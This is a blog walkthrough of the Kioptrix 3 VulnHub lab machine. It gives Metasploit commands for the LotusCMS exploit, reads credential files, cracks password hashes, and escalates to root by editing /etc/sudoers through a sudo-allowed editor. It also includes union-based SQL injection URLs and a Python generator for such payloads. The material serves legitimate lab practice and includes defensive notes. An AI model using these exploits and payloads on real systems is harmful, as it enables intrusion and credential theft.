WalkThrough! Kioptrix — 3 By VulnHub

Kamran Saifullah
8 min read, Mar 13, 2018

Hi,

I have written walkthroughs for the previous two Kioptrix machines, and today I am writing one for Kioptrix 3. I personally enjoyed exploiting this machine; it was fun to do. It is all about enumerating, then enumerating some more, and you are in.

To be honest, the Kioptrix machines are well designed for their levels: they move from the basics to more advanced material and test your knowledge accordingly. One can easily check his or her knowledge by exploiting these machines.

So let’s move forward;

Kioptrix 3 can be downloaded from the link below, and importing the VM is the same as always.

https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

The first step is always to find the IP address of the machine, and that is the same as always, i.e.:

netdiscover -i eth0

The next step was port scanning with Nmap, which showed the results below.

Only two ports were open:

  1. SSH (22)
  2. HTTP (80)

As port 80 was open, I knew a web application would be hosted on this machine, so I opened the IP address in the browser and found one served directly at that address.

After this I quickly ran Nikto, the web server vulnerability scanner, to look for any vulnerabilities and found these results:

From the results I found that Apache appeared to be outdated, and Nikto also listed several directories. It reported that phpMyAdmin was present, and it was. I tried logging into it with default credentials but failed, so I moved on to exploring the web application. Its front page can be seen below.

There was a blog and a login panel in the web application. I am always drawn to the login panel, so I opened it and found that it was running LotusCMS.

I tried some default credentials here, but none of them worked. I also tried bypassing it with SQL injection strings, but those did not work either. From my previous experience with the Kioptrix machines I had concluded that at least one thing is always vulnerable and that a public exploit is available for it, so I quickly ran:

searchsploit lotuscms

An exploit was available for LotusCMS. After this I opened Metasploit:

msfconsole

Once it had loaded, I searched for the LotusCMS exploit:

search lotuscms

I found this exploit, so I used it against the target IP address to check whether we could get a session or not:

use exploit/multi/http/lcms_php_exec

show options

set rhost 192.168.97.136

set PAYLOAD generic/shell_bind_tcp

set URI /

set LHOST <ourIP>

exploit

w00t, we got root. I mean, we got a command shell. (Note that generic/shell_bind_tcp is a bind payload: the payload opens a listener on the target and Metasploit connects to it, so LHOST is not actually used here; it only matters for reverse payloads.)

Now run pwd and ls -la, along with lsb_release -a, to see the current path, the files in it, and the OS details.

Now grab the /etc/passwd file to see the users on the system.

Okay, fine. The password hashes are in /etc/shadow, and as we are not root we cannot read that file. Now let's look at the gallery, the new one the blog's news post said was online, to check for any sensitive files. So I ran:

ls -la gallery

Now we have db.sql, though we cannot open it. We can open the PHP files, however, so I looked closely at them and found one named gconfig.php. I tried opening this file but was unable to.

So I thought of changing the payload to get a Meterpreter session. I used this payload instead:

set PAYLOAD php/meterpreter/bind_tcp

Then I ran 'exploit' again and got a Meterpreter session (still a bind payload, so Metasploit connects to the target rather than the other way round). Now I could easily open, download, and upload files between my machine and the target. So I moved into the gallery directory using:

cd /gallery

Then i ran;

cat gconfig.php

Boom, I found the database credentials the gallery uses, and they also work for the phpMyAdmin login.

So now let's log into phpMyAdmin using these credentials. Yes, we are now logged into phpMyAdmin.

From here my main goal was to get the usernames and passwords, and they were present here:

The issue here was that the passwords were hashed, so obviously we would have to crack them. I remembered a website for hash cracking, so I quickly used it to look up the hashes:

hashkiller.co.uk

Yes! I got the plaintext passwords, so now I'm in B)
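An online lookup service only works because the hashes are unsalted and the passwords are weak. The same thing can be done offline, which is what you should do on an engagement so that client hashes never leave your machine. The following is an added example, not code from the original post: it assumes unsalted MD5 (the post does not say which algorithm the gallery used), and both the wordlist and the user dump are constructed for this example rather than taken from the machine.

```python
import hashlib

# Constructed sample: usernames mapped to password hashes, shaped like a dump
# of a web app's users table. The hashes were generated from made-up
# plaintexts for this example; they are not the Kioptrix 3 hashes.
SAMPLE_DUMP = {
    "alice": "e10adc3949ba59abbe56e057f20f883e",   # md5("123456")
    "bob": hashlib.md5(b"starwars").hexdigest(),
    "carol": "0" * 32,                              # matches nothing below
}

# Constructed wordlist; a real run would stream rockyou.txt or similar.
WORDLIST = ["password", "123456", "letmein", "starwars", "qwerty"]


def crack_hashes(dump, wordlist, algorithm="md5"):
    """Offline dictionary attack against unsalted hashes.

    Returns {username: plaintext} for every hash that matched a wordlist
    entry. Because the hashes are unsalted, each candidate word is hashed
    once and checked against every user at the same time; that is exactly
    why an unsalted MD5 users table is so cheap to crack, and why a salted,
    slow hash (bcrypt, scrypt, Argon2) forces one hash per user per guess.
    """
    # Index the dump by digest so several users sharing a password all fall
    # out of a single lookup.
    by_digest = {}
    for user, digest in dump.items():
        by_digest.setdefault(digest.lower(), []).append(user)

    cracked = {}
    for word in wordlist:
        digest = hashlib.new(algorithm, word.encode()).hexdigest()
        for user in by_digest.get(digest, []):
            cracked[user] = word
    return cracked


if __name__ == "__main__":
    for user, plaintext in crack_hashes(SAMPLE_DUMP, WORDLIST).items():
        print(f"{user}: {plaintext}")
```

Anything that does not fall to a wordlist stays uncracked, which is the signal that a user chose a decent password; the `carol` entry above stands in for that case.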

Now that we have the usernames and the passwords we can log into the machine over SSH, so let's give it a try.

Here we go, we are successfully logged in via SSH. Yay! Oh wait,

this user has a restricted shell.

Now what? Let's log into the other account.

Fine for now. Let's read what the company policy says.

It says: "Please use 'sudo ht'" ;) Okay, so let's find out where this command lives.

Okay, fine for now. Let's see what 'sudo ht' actually does.

I got this error. As always, google your problems; I found:

https://stackoverflow.com/questions/6804208/nano-error-error-opening-terminal-xterm-256color

I simply had to run this in the terminal:
export TERM=xterm

Now let's run 'sudo ht' again :)

Here we go; the editor's menus are all driven with Alt :P Now we had to open a file so that we could give this user full access, i.e. root rights, and that file was '/etc/sudoers' :)

Now let's add '/bin/sh' to this user's sudo entry there.

Now let's go back to the shell and try 'sudo /bin/sh'.

That's all, we have root access ;) Wasn't it easy?
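The root cause here is a sudo rule that hands a low-privilege user an editor running as root: any program that can write arbitrary files as root can rewrite /etc/sudoers, so the "policy" was root access with one extra step. The check below is an added example, not from the original post, of how to triage `sudo -l` output for exactly this class of rule; the sample output, the username in it, and the list of risky binaries are constructed for the example (the post does not show `sudo -l`).

```python
import re

# Constructed sample of `sudo -l` output for a low-privilege user; the user
# name and rules are made up for this example.
SAMPLE_SUDO_L = """\
User someuser may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht, /bin/ls
"""

# Binaries that read/write arbitrary files or spawn a shell once they run as
# root. An editor such as ht can simply open and save /etc/sudoers.
RISKY = {
    "ht", "vi", "vim", "nano", "less", "more", "find", "awk", "sh", "bash",
    "python", "perl", "env", "cp", "tee",
}

# One rule line: "(runas) TAG: TAG: cmd1, cmd2"  (tags are optional)
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.*)$"
)


def parse_sudo_rules(text):
    """Yield (runas, tags, command) for every command granted in `sudo -l` output."""
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                yield m.group("runas"), tags, cmd


def risky_sudo_commands(text):
    """Return (runas, nopasswd, command) for granted commands that give root-equivalent access."""
    found = []
    for runas, tags, cmd in parse_sudo_rules(text):
        if cmd.startswith("!"):
            continue                      # a negated entry denies, it does not grant
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if cmd == "ALL" or binary in RISKY:
            found.append((runas, "NOPASSWD" in tags, cmd))
    return found


if __name__ == "__main__":
    for runas, nopasswd, cmd in risky_sudo_commands(SAMPLE_SUDO_L):
        print(f"({runas}) {'NOPASSWD ' if nopasswd else ''}{cmd}")
```

On the defensive side the fix is not a cleverer sudoers rule but not granting interactive editors at all; where a user genuinely needs to edit a root-owned file, `sudoedit` copies the file to a temporary location and the editor never runs as root.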

I didn't stop here, as I knew the online gallery was still there, and there had to be a reason for it. Right? So I went back to the main page, and from there I opened the blog where the link was given.

So my next target was the new gallery that was online. While browsing the site I found it was vulnerable to SQL injection; it took me a few minutes to spot. When I used the drop-down menu on the page, the link changed and caught my eye, so I tested there for SQL injection.

How did I know it was vulnerable? Quite simple: I added a single quote (') and an error appeared on the page. From there the rest of the exploitation follows.

The first thing is to find the number of columns, then the tables, then the columns, and then retrieve the data from those columns. I specifically hunted for user information, because I knew it was the only way into the machine.

kioptrix.com/gallery/gallery.php?id=1 order by 6 -- +-

kioptrix.com/gallery/gallery.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6 -- +-

Now let's list the tables in the current database. Right!

kioptrix.com/gallery/gallery.php?id=-1 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database() -- +-

Let's get the columns out of 'dev_accounts' (the table name is written as CHAR(...) so that the payload needs no quotes):

kioptrix.com/gallery/gallery.php?id=-1 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115) -- +-

Now let's pull the data out of these columns. Quite simple :)

kioptrix.com/gallery/gallery.php?id=-1 UNION ALL SELECT 1,group_concat(username,0x3a,password),3,4,5,6 from dev_accounts -- +-
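The four requests above are one procedure: find the column count with ORDER BY, confirm the UNION works, enumerate tables and columns through information_schema, then dump the target table with group_concat. The following is an added example, not code from the post, that builds those payloads programmatically so the same enumeration can be repeated against another parameter or column count. The column count (6), the table name (dev_accounts) and the `id` parameter follow the post; the host name in the usage line is the one the post uses, and the CHAR() encoding is the same quote-free trick the post applies to the table name.

```python
from urllib.parse import urlencode

COMMENT = " -- +-"   # MySQL comment to discard the rest of the original query


def char_encode(s):
    """Write a string as MySQL CHAR(...) so the injection needs no quotes."""
    return "CHAR(" + ", ".join(str(ord(c)) for c in s) + ")"


def order_by_probes(max_cols=10):
    """ORDER BY n probes: the first n that errors is one past the real column count."""
    return [f"1 order by {n}{COMMENT}" for n in range(1, max_cols + 1)]


def union_payload(ncols, expr, pos=2, from_clause=""):
    """UNION ALL SELECT with `expr` in column `pos` (a column echoed to the page)."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[pos - 1] = expr
    tail = f" from {from_clause}" if from_clause else ""
    return "-1 UNION ALL SELECT " + ",".join(cols) + tail + COMMENT


def tables_payload(ncols):
    return union_payload(
        ncols, "group_concat(table_name)",
        from_clause="information_schema.tables where table_schema=database()")


def columns_payload(ncols, table):
    return union_payload(
        ncols, "group_concat(column_name)",
        from_clause=f"information_schema.columns where table_name={char_encode(table)}")


def dump_payload(ncols, table, columns):
    """group_concat(col1,0x3a,col2,...) from table; 0x3a is ':' as a separator."""
    expr = "group_concat(" + ",0x3a,".join(columns) + ")"
    return union_payload(ncols, expr, from_clause=table)


def injected_url(base, param, payload):
    """Full request URL; urlencode turns spaces into '+' and escapes the literal '+'."""
    return base + "?" + urlencode({param: payload})


def parse_dump(text):
    """Turn 'user1:hash1,user2:hash2' (group_concat output) back into pairs."""
    return [tuple(item.split(":", 1)) for item in text.split(",") if ":" in item]


if __name__ == "__main__":
    base = "http://kioptrix.com/gallery/gallery.php"
    for payload in (tables_payload(6),
                    columns_payload(6, "dev_accounts"),
                    dump_payload(6, "dev_accounts", ["username", "password"])):
        print(injected_url(base, "id", payload))
```

The `pos` argument matters in practice: only a column that the page actually renders will display the group_concat result, which is why the manual probe with plain numbers (1 through 6) comes first.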

Here we go, we have the usernames and the password hashes. As before: crack the hashes, log into the machine via SSH, edit '/etc/sudoers', run 'sudo /bin/sh', and we are done. This injection can also be exploited with sqlmap; I didn't use it, as I do most things manually ;)

I hope you liked the walkthrough!

Thanks.

Kamran Saifullah

Malware/RE/Firmware Analysis, App Sec/Off Sec, VAPT, Phishing Simulations/SE | Risk Management, IS Governance, Audits, ISO 27001 LI